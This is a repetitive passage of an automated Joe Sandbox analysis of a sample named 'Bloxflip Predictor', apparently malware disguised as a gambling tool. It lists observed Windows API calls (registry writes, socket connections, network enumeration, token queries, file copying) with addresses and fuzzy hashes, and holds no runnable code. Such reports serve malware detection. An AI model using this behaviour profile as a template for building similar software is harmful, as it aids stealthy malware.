                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE1E11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3BC2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileView
                                            • String ID:
                                            • API String ID: 3314676101-0
                                            APIs
                                            • RegSetValueExW.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAD18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0FB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            APIs
                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05EE109F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DescriptorSecurity$ConvertString
                                            • String ID:
                                            • API String ID: 3907675253-0
                                            APIs
                                            • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 011BB2E5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,00000E24), ref: 05EE024B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 011BB011
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            APIs
                                            • CopyFileW.KERNEL32(?,?,?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BB1E6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            APIs
                                            • GetAdaptersAddresses.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2871
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdaptersAddresses
                                            • String ID:
                                            • API String ID: 2506852604-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE2006
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            APIs
                                            • SetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4DB3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            APIs
                                            • WSAEventSelect.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1B56
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EventSelect
                                            • String ID:
                                            • API String ID: 31538577-0
                                            APIs
                                            • shutdown.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE14D8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: shutdown
                                            • String ID:
                                            • API String ID: 2510479042-0
                                            APIs
                                            • GetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4CCF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            APIs
                                            • WSAIoctl.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE198D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Ioctl
                                            • String ID:
                                            • API String ID: 3041054344-0
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3CAA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            APIs
                                            • CreateMutexW.KERNEL32(?,?), ref: 011BAED9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            APIs
                                            • RasConnectionNotificationW.RASAPI32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1C2F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ConnectionNotification
                                            • String ID:
                                            • API String ID: 1402429939-0
                                            APIs
                                            • ReadFile.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0925
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            APIs
                                            • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05EE2932
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Connect
                                            • String ID:
                                            • API String ID: 3144859779-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            APIs
                                            • ioctlsocket.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE188F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAC2C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BA5B8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileView
                                            • String ID:
                                            • API String ID: 3314676101-0
                                            APIs
                                            • K32GetModuleInformation.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2DF6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationModule
                                            • String ID:
                                            • API String ID: 3425974696-0
                                            APIs
                                            • WSASocketW.WS2_32(?,?,?,?,?), ref: 05EE0C6E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Socket
                                            • String ID:
                                            • API String ID: 38366605-0
                                            APIs
                                            • RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 05EE1D05
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CurrentOpenUser
                                            • String ID:
                                            • API String ID: 1571386571-0
                                            APIs
                                            • SendMessageTimeoutA.USER32(?,00000E24), ref: 011BB115
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: MessageSendTimeout
                                            • String ID:
                                            • API String ID: 1599653421-0
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0FB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            APIs
                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1F10
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ChangeNotifyValue
                                            • String ID:
                                            • API String ID: 3933585183-0
                                            APIs
                                            • RegSetValueExW.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAD18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            APIs
                                            • GetNetworkParams.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE23F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: NetworkParams
                                            • String ID:
                                            • API String ID: 2134775280-0
                                            APIs
                                            • GetProcessTimes.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE17A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessTimes
                                            • String ID:
                                            • API String ID: 1995159646-0
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3BC2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            APIs
                                            • WSAEventSelect.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1B56
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EventSelect
                                            • String ID:
                                            • API String ID: 31538577-0
                                            APIs
                                            • K32EnumProcessModules.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2D06
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EnumModulesProcess
                                            • String ID:
                                            • API String ID: 1082081703-0
                                            APIs
                                            • SetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4DB3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            APIs
                                            • GetProcessWorkingSetSize.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4CCF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessSizeWorking
                                            • String ID:
                                            • API String ID: 3584180929-0
                                            APIs
                                            • GetExitCodeProcess.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4BF0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CodeExitProcess
                                            • String ID:
                                            • API String ID: 3861947596-0
                                            APIs
                                            • ReadFile.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0925
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3CAA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05EE3FBE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • ioctlsocket.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE188F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            APIs
                                            • shutdown.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE14D8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: shutdown
                                            • String ID:
                                            • API String ID: 2510479042-0
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,00000E24), ref: 05EE024B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 85d37b0373446a5acf06253f4440d942fe028999584324e9047489716e3782d9
                                            • Instruction ID: 10e947aa715b69642fcd40b88d46275c2ba595ec6eadf3fe99104328e86eb37a
                                            • Opcode Fuzzy Hash: 85d37b0373446a5acf06253f4440d942fe028999584324e9047489716e3782d9
                                            • Instruction Fuzzy Hash: 1611E571510204AFEB21CB11DC45FB6F7E8DF59724F188099EE485A782D2B4F548CAB6
                                            APIs
                                            • GetAdaptersAddresses.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2871
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdaptersAddresses
                                            • String ID:
                                            • API String ID: 2506852604-0
                                            • Opcode ID: dec160bf6c4e7a32a7bf1fcdd3a9da99dd42d73e1917de653d861c4fc6c227a2
                                            • Instruction ID: 805d256b27bd810e1b64855232cac1f566ee1aa7873d8645426198dddb94d831
                                            • Opcode Fuzzy Hash: dec160bf6c4e7a32a7bf1fcdd3a9da99dd42d73e1917de653d861c4fc6c227a2
                                            • Instruction Fuzzy Hash: 5411C276500604AFEB218F11DC44FA6FBECEF28724F08849AEE855A651D775E408CAB5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            • Opcode ID: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction ID: cd2dd2c8fb8fabd8f99b7f17ad2574f53b9e78759468cbe02889d87671869b68
                                            • Opcode Fuzzy Hash: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction Fuzzy Hash: 82113D756143449FEB20CF55D884FA2FBE8EF09614F0888AADD89CB662D370F548CB61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: select
                                            • String ID:
                                            • API String ID: 1274211008-0
                                            • Opcode ID: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction ID: 2b680fbc8a8397339b813d1a5821f5e32dff84805f5e9f0b744160596a4b6d92
                                            • Opcode Fuzzy Hash: f3d10bf2aa8106179460467252f7e390b6ededf209d0a6b34174fd0523594283
                                            • Instruction Fuzzy Hash: E91151756142049FEF20CF15D884FA6FBE9EF04624F0884AADD89CB696E375E448CB71
                                            APIs
                                            • RasConnectionNotificationW.RASAPI32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1C2F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ConnectionNotification
                                            • String ID:
                                            • API String ID: 1402429939-0
                                            • Opcode ID: e2860e9c5ada4a8d8043b40bc5dad2fb471615f0ac7d83153aa68b9ad84a37af
                                            • Instruction ID: 1cba917a679d006a7ca990980311f60e72e87dee8bec5e215545bbb418139039
                                            • Opcode Fuzzy Hash: e2860e9c5ada4a8d8043b40bc5dad2fb471615f0ac7d83153aa68b9ad84a37af
                                            • Instruction Fuzzy Hash: A311E171500204AFEB21CF01DC84FA6FBA8EF24724F08849AED499B741D375E448CAB6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 87c72bb140b96791939887365a964cf99faa5e13489d134891799d1bfcc4c263
                                            • Instruction ID: 413be2be9e2576595f300d0ab149df4f2d9cba185fe3ece47d38239d78c65966
                                            • Opcode Fuzzy Hash: 87c72bb140b96791939887365a964cf99faa5e13489d134891799d1bfcc4c263
                                            • Instruction Fuzzy Hash: 89118F71549380AFDB22CF15DC44B52FFB4EF4A224F0884DEED858B552D275A418CB62
                                            APIs
                                            • GetNetworkParams.IPHLPAPI(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE23F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
